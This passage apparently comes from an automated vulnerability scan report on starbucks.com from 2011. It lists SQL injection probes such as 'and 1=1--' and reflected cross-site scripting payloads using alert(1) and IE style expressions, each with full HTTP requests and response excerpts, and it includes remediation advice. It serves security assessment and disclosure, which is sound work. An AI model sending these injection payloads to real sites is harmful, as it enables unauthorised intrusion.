7.4. http://www.starbucks.com/customer-service/faqs/shop

7.5. http://www.starbucks.com/static/js/global.js

8. Robots.txt file

9. SSL certificate



1. SQL injection  next
There are 2 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://www.starbucks.com/menu/food/salads/fruit-cup [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.starbucks.com
Path:   /menu/food/salads/fruit-cup

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /menu/food/salads/fruit-cup?1'%20and%201%3d1--%20=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:01:53 GMT
Connection: close
Content-Length: 40081

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<div class="allergy">
                           
                       </div>
                       
               

                       <div id="disclaimer">
                           
       <p>Nutrition information is calculated with..data provided by the suppliers who manufacture food and beverage items for Starbucks Coffee Company. Variations may exist due to periodic changes in formulations.</p>

                           
                           <div class="full">
                               
       <p>Nutrition information is calculated with data provided by the suppliers who manufacture food and beverage items for Starbucks Coffee Company. Variations may exist due to periodic changes in formulations. Serving sizes may vary from those used to calculate nutrition information. We attempt to provide product information that is as complete as possible. Product changes or new product introductions may cause this information to become outdated or incomplete. Data is rounded to meet current U.S. FDA NLEA guidelines. Percentage data for vitamins and minerals refers to percentage of U.S. Daily Values for a 2,000 calorie diet. Products may vary from location to location. Our foods and beverages are produced and stored in environments where known allergens are present.</p>

                           </div>
                       </div>
               </div>
           </div>
       </div>

       <div id="content">
           <div id="content_main">
               
       <p>All fruit and vegetables have a season ... a time when they are abundant and taste best. This fruit cup, a delicious combo of seasonal fruit will have you looking forward to each new day on the calendar.</p>


               
               <div id="fun_facts">
                   <h3>Did you know?</h3>
                   <p>Like apples? There are more than 7,500 known types of apples.</p>
               </div>
               
               <div id="ingredients">
                   <h4>Ingredients</h4>
                   <p>pineapple, cantaloupe, kiwi or mango, grapes. ingredients may vary by season.</p>
               </div>
               
           </div>

           <div id="content_rail">
               
               <div id="available">
                   <p>
                       <strong>
                       
                       Currently Available
                       
                       </strong>
                       
                       
                   </p>

                   
                   
                   
               </div
...[SNIP]...

Request 2

GET /menu/food/salads/fruit-cup?1'%20and%201%3d2--%20=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:01:59 GMT
Connection: close
Content-Length: 40286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<div class="allergy">
                           <ul><li><a href="/menu/catalog/nutrition?food=all&amp;wellness=low-fat">Fat - 10g or less</a></li><li><a href="/menu/catalog/nutrition?food=all&amp;wellness=low-sodium">Sodium - 600mg or less</a></li></ul>
                       </div>
                       
               

                       <div id="disclaimer">
                           
       <p>Nutrition information is calculated with..data provided by the suppliers who manufacture food and beverage items for Starbucks Coffee Company. Variations may exist due to periodic changes in formulations.</p>

                           
                           <div class="full">
                               
       <p>Nutrition information is calculated with data provided by the suppliers who manufacture food and beverage items for Starbucks Coffee Company. Variations may exist due to periodic changes in formulations. Serving sizes may vary from those used to calculate nutrition information. We attempt to provide product information that is as complete as possible. Product changes or new product introductions may cause this information to become outdated or incomplete. Data is rounded to meet current U.S. FDA NLEA guidelines. Percentage data for vitamins and minerals refers to percentage of U.S. Daily Values for a 2,000 calorie diet. Products may vary from location to location. Our foods and beverages are produced and stored in environments where known allergens are present.</p>

                           </div>
                       </div>
               </div>
           </div>
       </div>

       <div id="content">
           <div id="content_main">
               
       <p>All fruit and vegetables have a season ... a time when they are abundant and taste best. This fruit cup, a delicious combo of seasonal fruit will have you looking forward to each new day on the calendar.</p>


               
               <div id="fun_facts">
                   <h3>Did you know?</h3>
                   <p>Like apples? There are more than 7,500 known types of apples.</p>
               </div>
               
               <div id="ingredients">
                   <h4>Ingredients</h4>
                   <p>pineapple, cantaloupe, kiwi or mango, grapes. ingredients may vary by season.</p>
               </div>
               
           </div>


...[SNIP]...

1.2. http://www.starbucks.com/menu/food/salads/picnic-pasta-salad [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.starbucks.com
Path:   /menu/food/salads/picnic-pasta-salad

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 13768680'%20or%201%3d1--%20 and 13768680'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /menu/food/salads/picnic-pasta-salad?113768680'%20or%201%3d1--%20=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:01:11 GMT
Connection: close
Content-Length: 41249

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</p>
                           <ul><li><a href="/menu/catalog/nutrition?food=all&amp;wellness=low-fat">Fat - 10g or less</a></li><li><a href="/menu/catalog/nutrition?food=all&amp;wellness=high-fiber">Fiber - at least 3g</a></li><li><a href="/menu/catalog/nutrition?food=all&amp;wellness=high-protein">Protein - at least 10g</a></li><li><a href="/menu/catalog/nutrition?food=all&amp;wellness=low-sodium">Sodium - 600mg or less</a></li></ul>
                       </div>
                       
               

                       <div id="disclaimer">
                           
       <p>Nutrition information is calculated with..data provided by the suppliers who manufacture food and beverage items for Starbucks Coffee Company. Variations may exist due to periodic changes in formulations.</p>

                           
                           <div class="full">
                               
       <p>Nutrition information is calculated with data provided by the suppliers who manufacture food and beverage items for Starbucks Coffee Company. Variations may exist due to periodic changes in formulations. Serving sizes may vary from those used to calculate nutrition information. We attempt to provide product information that is as complete as possible. Product changes or new product introductions may cause this information to become outdated or incomplete. Data is rounded to meet current U.S. FDA NLEA guidelines. Percentage data for vitamins and minerals refers to percentage of U.S. Daily Values for a 2,000 calorie diet. Products may vary from location to location. Our foods and beverages are produced and stored in environments where known allergens are present.</p>

                           </div>
                       </div>
               </div>
           </div>
       </div>

       <div id="content">
           <div id="content_main">
               
       <p>Summer picnics are more fun with lots of good food to pack the basket. And this light salad is packed with chicken, shredded carrots, grape tomatoes, diced zucchini and bowtie pasta. It...s topped with a red wine vinaigrette dressing that won...t weigh you down. All you need is a fork and an appetite.</p>


               
               <div id="fun_facts"
...[SNIP]...

Request 2

GET /menu/food/salads/picnic-pasta-salad?113768680'%20or%201%3d2--%20=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:01:42 GMT
Connection: close
Content-Length: 40841

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</p>
                           
                       </div>
                       
               

                       <div id="disclaimer">
                           
       <p>Nutrition information is calculated with..data provided by the suppliers who manufacture food and beverage items for Starbucks Coffee Company. Variations may exist due to periodic changes in formulations.</p>

                           
                           <div class="full">
                               
       <p>Nutrition information is calculated with data provided by the suppliers who manufacture food and beverage items for Starbucks Coffee Company. Variations may exist due to periodic changes in formulations. Serving sizes may vary from those used to calculate nutrition information. We attempt to provide product information that is as complete as possible. Product changes or new product introductions may cause this information to become outdated or incomplete. Data is rounded to meet current U.S. FDA NLEA guidelines. Percentage data for vitamins and minerals refers to percentage of U.S. Daily Values for a 2,000 calorie diet. Products may vary from location to location. Our foods and beverages are produced and stored in environments where known allergens are present.</p>

                           </div>
                       </div>
               </div>
           </div>
       </div>

       <div id="content">
           <div id="content_main">
               
       <p>Summer picnics are more fun with lots of good food to pack the basket. And this light salad is packed with chicken, shredded carrots, grape tomatoes, diced zucchini and bowtie pasta. It...s topped with a red wine vinaigrette dressing that won...t weigh you down. All you need is a fork and an appetite.</p>


               
               <div id="fun_facts">
                   <h3>Did you know?</h3>
                   <p>The first American pasta factory was opened in Brooklyn, New York, in 1848, by a Frenchman named Antoine Zerega.</p>
               </div>
               
               <div id="ingredients">
                   <h4>Ingredients</h4>
                   <p>picnic pasta salad (water, farfalle pasta [semolina (wheat), durum flour (wheat), niacin, iron (ferrous sulfate), thiamine mononitrate, riboflavin, folic acid], zucchini
...[SNIP]...

2. Cross-site scripting (reflected)  previous  next
There are 327 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://www.starbucks.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95116"%3balert(1)//81dd21ba950 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 95116";alert(1)//81dd21ba950 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?95116"%3balert(1)//81dd21ba950=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:13:59 GMT
Connection: close
Content-Length: 41116

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<script type="text/javascript">
       var flashvars = {};
       flashvars.playerType = "homepage";
       flashvars.playlistID = "69777476001";
       flashvars.playerLocation = "http://www.starbucks.com/?95116";alert(1)//81dd21ba950=1";
       var params = {};
       params.loop = "false";
       params.quality = "best";
       params.scale = "exactfit";
       params.wmode = "transparent";
       params.allowscriptaccess = "always";
       params.allownetw
...[SNIP]...

2.2. http://www.starbucks.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9ce4"style%3d"x%3aexpression(alert(1))"c1e3c89638a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a9ce4"style="x:expression(alert(1))"c1e3c89638a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?a9ce4"style%3d"x%3aexpression(alert(1))"c1e3c89638a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:13:55 GMT
Connection: close
Content-Length: 41173

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<a href="http://www.addthis.com/bookmark.php?v=250&amp;username=starbucks&amp;url=http://www.starbucks.com/?a9ce4"style="x:expression(alert(1))"c1e3c89638a=1" class="addthis_button_compact" title="Post to AddThis">
...[SNIP]...

2.3. http://www.starbucks.com/about-us [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /about-us

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9592"style%3d"x%3aexpression(alert(1))"d1e7701208 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a9592"style="x:expression(alert(1))"d1e7701208 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /about-us?a9592"style%3d"x%3aexpression(alert(1))"d1e7701208=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:13:39 GMT
Connection: close
Content-Length: 38564

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/about-us?a9592"style="x:expression(alert(1))"d1e7701208=1" />
...[SNIP]...

2.4. http://www.starbucks.com/about-us/company-information [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /about-us/company-information

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48515"style%3d"x%3aexpression(alert(1))"882196566b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 48515"style="x:expression(alert(1))"882196566b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /about-us/company-information?48515"style%3d"x%3aexpression(alert(1))"882196566b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:20:01 GMT
Connection: close
Content-Length: 39249

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/about-us/company-information?48515"style="x:expression(alert(1))"882196566b=1" />
...[SNIP]...

2.5. http://www.starbucks.com/about-us/company-information/online-policies/privacy-statement [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /about-us/company-information/online-policies/privacy-statement

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6624b"style%3d"x%3aexpression(alert(1))"6dff94306a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6624b"style="x:expression(alert(1))"6dff94306a9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /about-us/company-information/online-policies/privacy-statement?6624b"style%3d"x%3aexpression(alert(1))"6dff94306a9=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:20:44 GMT
Connection: close
Content-Length: 52934

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/about-us/company-information/online-policies/privacy-statement?6624b"style="x:expression(alert(1))"6dff94306a9=1" />
...[SNIP]...

2.6. http://www.starbucks.com/about-us/company-information/online-policies/terms-of-use [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /about-us/company-information/online-policies/terms-of-use

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 177c1"style%3d"x%3aexpression(alert(1))"405a7c3edc3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 177c1"style="x:expression(alert(1))"405a7c3edc3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /about-us/company-information/online-policies/terms-of-use?177c1"style%3d"x%3aexpression(alert(1))"405a7c3edc3=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:21:24 GMT
Connection: close
Content-Length: 68896

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/about-us/company-information/online-policies/terms-of-use?177c1"style="x:expression(alert(1))"405a7c3edc3=1" />
...[SNIP]...

2.7. http://www.starbucks.com/about-us/company-information/online-policies/web-accessibility [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /about-us/company-information/online-policies/web-accessibility

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30cc8"style%3d"x%3aexpression(alert(1))"6c461a50f50 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 30cc8"style="x:expression(alert(1))"6c461a50f50 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /about-us/company-information/online-policies/web-accessibility?30cc8"style%3d"x%3aexpression(alert(1))"6c461a50f50=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:20:20 GMT
Connection: close
Content-Length: 39352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/about-us/company-information/online-policies/web-accessibility?30cc8"style="x:expression(alert(1))"6c461a50f50=1" />
...[SNIP]...

2.8. http://www.starbucks.com/about-us/company-information/product-advisories [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /about-us/company-information/product-advisories

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4cd5c"style%3d"x%3aexpression(alert(1))"3d37d7257db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4cd5c"style="x:expression(alert(1))"3d37d7257db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /about-us/company-information/product-advisories?4cd5c"style%3d"x%3aexpression(alert(1))"3d37d7257db=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
